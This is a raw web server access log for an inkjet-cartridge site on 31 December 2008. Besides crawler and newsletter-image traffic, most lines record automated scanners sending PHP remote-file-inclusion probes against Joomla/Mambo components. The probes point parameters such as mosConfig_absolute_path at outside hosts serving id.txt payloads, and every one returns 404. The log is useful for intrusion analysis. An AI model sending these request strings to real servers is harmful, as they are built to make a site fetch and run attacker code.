128.2.204.134 - - [31/Dec/2008:16:06:48 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "PrivacyFinder/1.1" "site.inkjetcartridge.com"
128.2.204.134 - - [31/Dec/2008:16:06:48 -0800] "GET / HTTP/1.1" 200 2132 "-" "PrivacyFinder/1.1" "site.inkjetcartridge.com"
85.14.221.111 - - [31/Dec/2008:16:16:15 -0800] "GET /logs/access_081101.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
85.14.221.111 - - [31/Dec/2008:16:16:15 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
85.14.221.111 - - [31/Dec/2008:16:16:15 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
82.228.186.94 - - [31/Dec/2008:16:19:10 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://deblaterer.com/themes/AstroGlobes/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
82.228.186.94 - - [31/Dec/2008:16:19:11 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://deblaterer.com/themes/AstroGlobes/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:24:17 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
74.6.22.110 - - [31/Dec/2008:16:25:07 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:33:07 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:33:07 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:33:07 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:37:16 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:40:14 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:40:14 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:42:43 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:42:43 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:42:44 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
24.6.241.101 - - [31/Dec/2008:16:43:47 -0800] "GET /email/images/inkmail7_01.gif HTTP/1.1" 200 7496 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081209 Thunderbird/2.0.0.19" "site.inkjetcartridge.com"
24.6.241.101 - - [31/Dec/2008:16:43:47 -0800] "GET /email/images/inkmail7_02.gif HTTP/1.1" 200 16965 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081209 Thunderbird/2.0.0.19" "site.inkjetcartridge.com"
24.6.241.101 - - [31/Dec/2008:16:43:48 -0800] "GET /email/images/inkmail7_03.gif HTTP/1.1" 200 18076 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081209 Thunderbird/2.0.0.19" "site.inkjetcartridge.com"
24.6.241.101 - - [31/Dec/2008:16:43:48 -0800] "GET /email/images/inkmail7_04.gif HTTP/1.1" 200 17259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081209 Thunderbird/2.0.0.19" "site.inkjetcartridge.com"
24.6.241.101 - - [31/Dec/2008:16:43:48 -0800] "GET /email/images/inkmail7_05.gif HTTP/1.1" 200 16767 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081209 Thunderbird/2.0.0.19" "site.inkjetcartridge.com"
24.6.241.101 - - [31/Dec/2008:16:43:48 -0800] "GET /email/images/inkmail7_06.gif HTTP/1.1" 200 26753 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081209 Thunderbird/2.0.0.19" "site.inkjetcartridge.com"
66.249.65.203 - - [31/Dec/2008:16:44:07 -0800] "GET /phpbb/viewtopic.php?p=4515 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "site.inkjetcartridge.com"
65.23.153.9 - - [31/Dec/2008:16:46:06 -0800] "GET /links/add_link.html HTTP/1.1" 200 13168 "http://site.inkjetcartridge.com/links/add_link.html" "-" "site.inkjetcartridge.com"
66.229.119.91 - - [31/Dec/2008:16:46:08 -0800] "GET /links/add_link.html HTTP/1.1" 200 13168 "http://site.inkjetcartridge.com/links/add_link.html" "-" "site.inkjetcartridge.com"
213.165.79.77 - - [31/Dec/2008:16:54:34 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
87.106.245.44 - - [31/Dec/2008:16:54:36 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:54:52 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
194.117.233.60 - - [31/Dec/2008:16:54:53 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:56:21 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:56:21 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:56:21 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
65.55.108.235 - - [31/Dec/2008:16:56:43 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
65.55.108.235 - - [31/Dec/2008:16:56:43 -0800] "GET /?D=D HTTP/1.1" 200 2132 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
200.48.189.130 - - [31/Dec/2008:16:59:36 -0800] "GET /logs/scripts.log/errors.php?error=http://indoirc.go.ro/idindry.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
200.48.189.130 - - [31/Dec/2008:16:59:36 -0800] "GET /logs/errors.php?error=http://indoirc.go.ro/idindry.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
200.48.189.130 - - [31/Dec/2008:16:59:36 -0800] "GET /errors.php?error=http://indoirc.go.ro/idindry.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:59:46 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:59:46 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:16:59:46 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.106.245.44 - - [31/Dec/2008:17:01:45 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
87.106.245.44 - - [31/Dec/2008:17:01:45 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
87.106.245.44 - - [31/Dec/2008:17:01:46 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:09:28 -0800] "GET /logs/access.log///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:09:28 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:09:28 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:10:30 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:11:06 -0800] "GET /logs///index.php?meio.php=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:11:07 -0800] "GET //index.php?meio.php=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:11:35 -0800] "GET //index.php?meio.php=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
87.106.245.44 - - [31/Dec/2008:17:13:46 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
213.165.79.77 - - [31/Dec/2008:17:13:50 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.132.74.7 - - [31/Dec/2008:17:14:11 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
71.182.145.252 - - [31/Dec/2008:17:14:32 -0800] "GET /email/images/inkmail7_03.gif HTTP/1.1" 200 18076 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; SPC 3.1 P1 Ta; MSOffice 12)" "site.inkjetcartridge.com"
71.182.145.252 - - [31/Dec/2008:17:14:32 -0800] "GET /email/images/inkmail7_05.gif HTTP/1.1" 200 16767 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; SPC 3.1 P1 Ta; MSOffice 12)" "site.inkjetcartridge.com"
71.182.145.252 - - [31/Dec/2008:17:14:32 -0800] "GET /email/images/inkmail7_04.gif HTTP/1.1" 200 17259 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; SPC 3.1 P1 Ta; MSOffice 12)" "site.inkjetcartridge.com"
71.182.145.252 - - [31/Dec/2008:17:14:32 -0800] "GET /email/images/inkmail7_02.gif HTTP/1.1" 200 16965 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; SPC 3.1 P1 Ta; MSOffice 12)" "site.inkjetcartridge.com"
71.182.145.252 - - [31/Dec/2008:17:14:32 -0800] "GET /email/images/inkmail7_01.gif HTTP/1.1" 200 7496 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; SPC 3.1 P1 Ta; MSOffice 12)" "site.inkjetcartridge.com"
71.182.145.252 - - [31/Dec/2008:17:14:32 -0800] "GET /email/images/inkmail7_06.gif HTTP/1.1" 200 26753 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; SPC 3.1 P1 Ta; MSOffice 12)" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:15:20 -0800] "GET /logs/access.log///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:15:21 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:15:21 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:16:39 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:16:59 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
124.82.79.138 - - [31/Dec/2008:17:17:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:18:35 -0800] "GET /logs/access.log///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:18:35 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:18:35 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.243.214.11 - - [31/Dec/2008:17:19:01 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cobra11fuchs.altervista.org/IDvalido.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.243.214.11 - - [31/Dec/2008:17:19:01 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cobra11fuchs.altervista.org/IDvalido.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
84.243.214.11 - - [31/Dec/2008:17:19:01 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cobra11fuchs.altervista.org/IDvalido.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:17:19:18 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:17:19:18 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:17:19:19 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:19:36 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:19:36 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:17:19:39 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:17:19:39 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
87.233.130.27 - - [31/Dec/2008:17:19:39 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:20:06 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.222.23.200 - - [31/Dec/2008:17:20:06 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
24.11.163.129 - - [31/Dec/2008:17:21:25 -0800] "GET /email/images/inkmail7_01.gif HTTP/1.1" 200 7496 "http://us.mg1.mail.yahoo.com/dc/launch?.rand=3o04a4bkjspqu" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7D261C65-74B2-44E0-A9B1-21587A28D7C9}; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
24.11.163.129 - - [31/Dec/2008:17:21:25 -0800] "GET /email/images/inkmail7_02.gif HTTP/1.1" 200 16965 "http://us.mg1.mail.yahoo.com/dc/launch?.rand=3o04a4bkjspqu" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7D261C65-74B2-44E0-A9B1-21587A28D7C9}; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
24.11.163.129 - - [31/Dec/2008:17:21:25 -0800] "GET /email/images/inkmail7_03.gif HTTP/1.1" 200 18076 "http://us.mg1.mail.yahoo.com/dc/launch?.rand=3o04a4bkjspqu" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7D261C65-74B2-44E0-A9B1-21587A28D7C9}; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
24.11.163.129 - - [31/Dec/2008:17:21:25 -0800] "GET /email/images/inkmail7_04.gif HTTP/1.1" 200 17259 "http://us.mg1.mail.yahoo.com/dc/launch?.rand=3o04a4bkjspqu" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7D261C65-74B2-44E0-A9B1-21587A28D7C9}; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
24.11.163.129 - - [31/Dec/2008:17:21:25 -0800] "GET /email/images/inkmail7_05.gif HTTP/1.1" 200 16767 "http://us.mg1.mail.yahoo.com/dc/launch?.rand=3o04a4bkjspqu" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7D261C65-74B2-44E0-A9B1-21587A28D7C9}; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
24.11.163.129 - - [31/Dec/2008:17:21:25 -0800] "GET /email/images/inkmail7_06.gif HTTP/1.1" 200 26753 "http://us.mg1.mail.yahoo.com/dc/launch?.rand=3o04a4bkjspqu" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7D261C65-74B2-44E0-A9B1-21587A28D7C9}; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
89.108.67.99 - - [31/Dec/2008:17:23:04 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
91.142.211.198 - - [31/Dec/2008:17:24:45 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.142.211.198 - - [31/Dec/2008:17:24:45 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.142.211.198 - - [31/Dec/2008:17:24:45 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:25:55 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:26:35 -0800] "GET /logs///index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:26:35 -0800] "GET //index.php?meio=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:27:10 -0800] "GET /logs/access_081101.log///index.php?meio.php=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:27:11 -0800] "GET //index.php?meio.php=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
85.214.53.78 - - [31/Dec/2008:17:27:11 -0800] "GET /logs///index.php?meio.php=http://ifps.tapvirtual.com//downloads/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "site.inkjetcartridge.com"
213.165.79.77 - - [31/Dec/2008:17:27:36 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
213.165.79.77 - - [31/Dec/2008:17:27:36 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
213.165.79.77 - - [31/Dec/2008:17:27:36 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
